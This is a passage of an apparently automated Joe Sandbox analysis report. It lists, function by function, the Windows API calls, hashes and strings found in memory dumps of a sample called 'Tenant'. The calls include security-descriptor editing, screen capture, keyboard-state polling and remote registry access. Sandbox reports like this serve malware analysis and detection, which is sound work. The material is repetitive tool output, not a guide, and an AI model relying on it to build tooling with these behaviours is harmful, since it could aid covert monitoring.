• Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
• Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
Similarity
• API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
• String ID: 0
• API String ID: 1296962147-4108050209
• Opcode ID: 7ceed00bea0e3432a4138928aaf4843e0902c3b33a289475d5e7be9988d5aa8d
• Instruction ID: 253524f6922e94e38b9a83c3d63652eaf65ec7f0b832a2a0b43502ad6993ebcc
• Opcode Fuzzy Hash: 7ceed00bea0e3432a4138928aaf4843e0902c3b33a289475d5e7be9988d5aa8d
• Instruction Fuzzy Hash: BC819B702083259FD710DF14E985A6EBBE8FF89314F1045ADF99993291CB30DD05CBA2
                                                                                        APIs
                                                                                          • Part of subcall function 00AF8E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00AF8E3C
                                                                                          • Part of subcall function 00AF8E20: GetLastError.KERNEL32(?,00AF8900,?,?,?), ref: 00AF8E46
                                                                                          • Part of subcall function 00AF8E20: GetProcessHeap.KERNEL32(00000008,?,?,00AF8900,?,?,?), ref: 00AF8E55
                                                                                          • Part of subcall function 00AF8E20: HeapAlloc.KERNEL32(00000000,?,00AF8900,?,?,?), ref: 00AF8E5C
                                                                                          • Part of subcall function 00AF8E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00AF8E73
                                                                                          • Part of subcall function 00AF8EBD: GetProcessHeap.KERNEL32(00000008,00AF8916,00000000,00000000,?,00AF8916,?), ref: 00AF8EC9
                                                                                          • Part of subcall function 00AF8EBD: HeapAlloc.KERNEL32(00000000,?,00AF8916,?), ref: 00AF8ED0
                                                                                          • Part of subcall function 00AF8EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00AF8916,?), ref: 00AF8EE1
                                                                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00AF8B2E
                                                                                        • _memset.LIBCMT ref: 00AF8B43
                                                                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00AF8B62
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00AF8B73
                                                                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00AF8BB0
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00AF8BCC
                                                                                        • GetLengthSid.ADVAPI32(?), ref: 00AF8BE9
                                                                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00AF8BF8
                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 00AF8BFF
                                                                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00AF8C20
                                                                                        • CopySid.ADVAPI32(00000000), ref: 00AF8C27
                                                                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00AF8C58
                                                                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00AF8C7E
                                                                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00AF8C92
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3996160137-0
                                                                                        • Opcode ID: e098b3e19ddd4e486730235b1f6d0a53956e8f84d0354c53c2ba947373a86810
                                                                                        • Instruction ID: 3f837973a95e9fc03e2cb56fd46cc52704899fed95be207e97830bd15170d279
                                                                                        • Opcode Fuzzy Hash: e098b3e19ddd4e486730235b1f6d0a53956e8f84d0354c53c2ba947373a86810
                                                                                        • Instruction Fuzzy Hash: 6361547590020DAFDF149FA1DD85EBEBBB9FF04300F14816AFA15A7290DB399A05CB60
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 00B17A79
                                                                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00B17A85
                                                                                        • CreateCompatibleDC.GDI32(?), ref: 00B17A91
                                                                                        • SelectObject.GDI32(00000000,?), ref: 00B17A9E
                                                                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00B17AF2
                                                                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00B17B2E
                                                                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00B17B52
                                                                                        • SelectObject.GDI32(00000006,?), ref: 00B17B5A
                                                                                        • DeleteObject.GDI32(?), ref: 00B17B63
                                                                                        • DeleteDC.GDI32(00000006), ref: 00B17B6A
                                                                                        • ReleaseDC.USER32(00000000,?), ref: 00B17B75
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                        • String ID: (
                                                                                        • API String ID: 2598888154-3887548279
                                                                                        • Opcode ID: 03f5bceae7c831c5b0b1bbeda987d34d0e6a39c0774aa768f9e95bb63a7e3ed9
                                                                                        • Instruction ID: b352f33b46a0ad24ad4b87d487664c65ba7719f61ca925022e6db42ab397d7de
                                                                                        • Opcode Fuzzy Hash: 03f5bceae7c831c5b0b1bbeda987d34d0e6a39c0774aa768f9e95bb63a7e3ed9
                                                                                        • Instruction Fuzzy Hash: 8F514A71954209EFCB14DFA8CC95EAEBBF9EF48310F14845DF95AA7210DB31A941CB60
                                                                                        APIs
                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00B0A4D4
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 00B0A4F6
                                                                                        • __swprintf.LIBCMT ref: 00B0A54F
                                                                                        • __swprintf.LIBCMT ref: 00B0A568
                                                                                        • _wprintf.LIBCMT ref: 00B0A61E
                                                                                        • _wprintf.LIBCMT ref: 00B0A63C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                        • API String ID: 311963372-2391861430
                                                                                        • Opcode ID: 440899baf24f9193ace81bf5c03aee718e873bba6672b22363dc0300243fdbb7
                                                                                        • Instruction ID: af77d34161f64ae9178c074a8bd29dcfeb33f1320f80ad0ab79ad00771b60f4b
                                                                                        • Opcode Fuzzy Hash: 440899baf24f9193ace81bf5c03aee718e873bba6672b22363dc0300243fdbb7
                                                                                        • Instruction Fuzzy Hash: 2B516D71800219AACF15EBE0CEA6EEEBBB9AF14340F5041A5F505721A2EF316F58CB51
                                                                                        APIs
                                                                                          • Part of subcall function 00B0951A: __time64.LIBCMT ref: 00B09524
                                                                                          • Part of subcall function 00AB4A8C: _fseek.LIBCMT ref: 00AB4AA4
                                                                                        • __wsplitpath.LIBCMT ref: 00B097EF
                                                                                          • Part of subcall function 00AC431E: __wsplitpath_helper.LIBCMT ref: 00AC435E
                                                                                        • _wcscpy.LIBCMT ref: 00B09802
                                                                                        • _wcscat.LIBCMT ref: 00B09815
                                                                                        • __wsplitpath.LIBCMT ref: 00B0983A
                                                                                        • _wcscat.LIBCMT ref: 00B09850
                                                                                        • _wcscat.LIBCMT ref: 00B09863
                                                                                          • Part of subcall function 00B09560: _memmove.LIBCMT ref: 00B09599
                                                                                          • Part of subcall function 00B09560: _memmove.LIBCMT ref: 00B095A8
                                                                                        • _wcscmp.LIBCMT ref: 00B097AA
                                                                                          • Part of subcall function 00B09CF1: _wcscmp.LIBCMT ref: 00B09DE1
                                                                                          • Part of subcall function 00B09CF1: _wcscmp.LIBCMT ref: 00B09DF4
                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00B09A0D
                                                                                        • _wcsncpy.LIBCMT ref: 00B09A80
                                                                                        • DeleteFileW.KERNEL32(?,?), ref: 00B09AB6
                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00B09ACC
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B09ADD
                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00B09AEF
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                                        • String ID:
                                                                                        • API String ID: 1500180987-0
                                                                                        • Opcode ID: d120eeb397bdaa94a2ff591d417e3ff4d1e2dea938bfbb92b7ddada6666dafe3
                                                                                        • Instruction ID: 4dd520d8facd59ab1a4a1cc81a6586a6bb61108da270b73d4fc45fa44d2737bd
                                                                                        • Opcode Fuzzy Hash: d120eeb397bdaa94a2ff591d417e3ff4d1e2dea938bfbb92b7ddada6666dafe3
                                                                                        • Instruction Fuzzy Hash: A6C13EB1D00219AADF11DF95CD85EDEBBBDEF48340F0040AAF609E7152EB319A858F65
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00AB5BF1
                                                                                        • GetMenuItemCount.USER32(00B67890), ref: 00AF0E7B
                                                                                        • GetMenuItemCount.USER32(00B67890), ref: 00AF0F2B
                                                                                        • GetCursorPos.USER32(?), ref: 00AF0F6F
                                                                                        • SetForegroundWindow.USER32(00000000), ref: 00AF0F78
                                                                                        • TrackPopupMenuEx.USER32(00B67890,00000000,?,00000000,00000000,00000000), ref: 00AF0F8B
                                                                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00AF0F97
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                        • String ID:
                                                                                        • API String ID: 2751501086-0
                                                                                        • Opcode ID: a0f3bd0807d6b483679e687e0c69b6c9e0f8abcd1424a57a3ff10e03ed646b68
                                                                                        • Instruction ID: b9b465dc7f868e87800abf353fe71ac59117464fbb0d885def3c396a2ffd240f
                                                                                        • Opcode Fuzzy Hash: a0f3bd0807d6b483679e687e0c69b6c9e0f8abcd1424a57a3ff10e03ed646b68
                                                                                        • Instruction Fuzzy Hash: 5671E430A44709BFFB219BA4CC89FEABF69FF05364F244216F614661D2CBB16850DB90
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
                                                                                        • _memset.LIBCMT ref: 00AF8489
                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00AF84BE
                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00AF84DA
                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00AF84F6
                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00AF8520
                                                                                        • CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00AF8548
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AF8553
                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00AF8558
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                        • API String ID: 1411258926-22481851
                                                                                        • Opcode ID: 9cac6ae4c1da72d0ba55a43230d9263a16661eef9d4c514545ce5acc81f736b4
                                                                                        • Instruction ID: 7f4b98d735b13536c30bcaf357ef036ab6f2254e23b93d2d44f0c15d5e6482fe
                                                                                        • Opcode Fuzzy Hash: 9cac6ae4c1da72d0ba55a43230d9263a16661eef9d4c514545ce5acc81f736b4
                                                                                        • Instruction Fuzzy Hash: 7E41F372C1022DABCF15EBE4DDA5DEEB7B8BF04341B444169F905A3162EA359E04CB90
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B2040D,?,?), ref: 00B21491
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                        • API String ID: 3964851224-909552448
                                                                                        • Opcode ID: 31669228be4105af71258525411ae7c0d5329d72b09b539dc11bb7f210a52cb1
                                                                                        • Instruction ID: 83bb3d6aa6c4255c07458e2320f853fd14d6461059b561da22f1687752722688
                                                                                        • Opcode Fuzzy Hash: 31669228be4105af71258525411ae7c0d5329d72b09b539dc11bb7f210a52cb1
                                                                                        • Instruction Fuzzy Hash: 9741483150026ACFCF01EF54E951AEA37A5FF71310F6048D9EC565B296DB31AE1ACB60
                                                                                        APIs
                                                                                          • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
                                                                                          • Part of subcall function 00AB153B: _memmove.LIBCMT ref: 00AB15C4
                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00B058EB
                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00B05901
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B05912
                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00B05924
                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00B05935
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString$_memmove
                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                        • API String ID: 2279737902-1007645807
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                                        • String ID: 0.0.0.0
                                                                                        • API String ID: 208665112-3771769585
                                                                                        APIs
                                                                                        • timeGetTime.WINMM ref: 00B05535
                                                                                          • Part of subcall function 00AC083E: timeGetTime.WINMM(?,00000002,00AAC22C), ref: 00AC0842
                                                                                        • Sleep.KERNEL32(0000000A), ref: 00B05561
                                                                                        • EnumThreadWindows.USER32(?,Function_000654E3,00000000), ref: 00B05585
                                                                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00B055A7
                                                                                        • SetActiveWindow.USER32 ref: 00B055C6
                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00B055D4
                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00B055F3
                                                                                        • Sleep.KERNEL32(000000FA), ref: 00B055FE
                                                                                        • IsWindow.USER32 ref: 00B0560A
                                                                                        • EndDialog.USER32(00000000), ref: 00B0561B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                        • String ID: BUTTON
                                                                                        • API String ID: 1194449130-3405671355
                                                                                        APIs
                                                                                          • Part of subcall function 00AA4D37: __itow.LIBCMT ref: 00AA4D62
                                                                                          • Part of subcall function 00AA4D37: __swprintf.LIBCMT ref: 00AA4DAC
                                                                                        • CoInitialize.OLE32(00000000), ref: 00B0DC2D
                                                                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00B0DCC0
                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00B0DCD4
                                                                                        • CoCreateInstance.OLE32(00B33D4C,00000000,00000001,00B5B86C,?), ref: 00B0DD20
                                                                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00B0DD8F
                                                                                        • CoTaskMemFree.OLE32(?,?), ref: 00B0DDE7
                                                                                        • _memset.LIBCMT ref: 00B0DE24
                                                                                        • SHBrowseForFolderW.SHELL32(?), ref: 00B0DE60
                                                                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00B0DE83
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00B0DE8A
                                                                                        • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 00B0DEC1
                                                                                        • CoUninitialize.OLE32(00000001,00000000), ref: 00B0DEC3
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1246142700-0
                                                                                        APIs
                                                                                        • GetKeyboardState.USER32(?), ref: 00B00896
                                                                                        • SetKeyboardState.USER32(?), ref: 00B00901
                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 00B00921
                                                                                        • GetKeyState.USER32(000000A0), ref: 00B00938
                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 00B00967
                                                                                        • GetKeyState.USER32(000000A1), ref: 00B00978
                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 00B009A4
                                                                                        • GetKeyState.USER32(00000011), ref: 00B009B2
                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 00B009DB
                                                                                        • GetKeyState.USER32(00000012), ref: 00B009E9
                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 00B00A12
                                                                                        • GetKeyState.USER32(0000005B), ref: 00B00A20
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: State$Async$Keyboard
                                                                                        • String ID:
                                                                                        • API String ID: 541375521-0
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,00000001), ref: 00AFCE1C
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00AFCE2E
                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00AFCE8C
                                                                                        • GetDlgItem.USER32(?,00000002), ref: 00AFCE97
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00AFCEA9
                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00AFCEFD
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00AFCF0B
                                                                                        • GetWindowRect.USER32(00000000,?), ref: 00AFCF1C
                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00AFCF5F
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00AFCF6D
                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00AFCF8A
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00AFCF97
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                         • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmp
                                                                                         • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmp
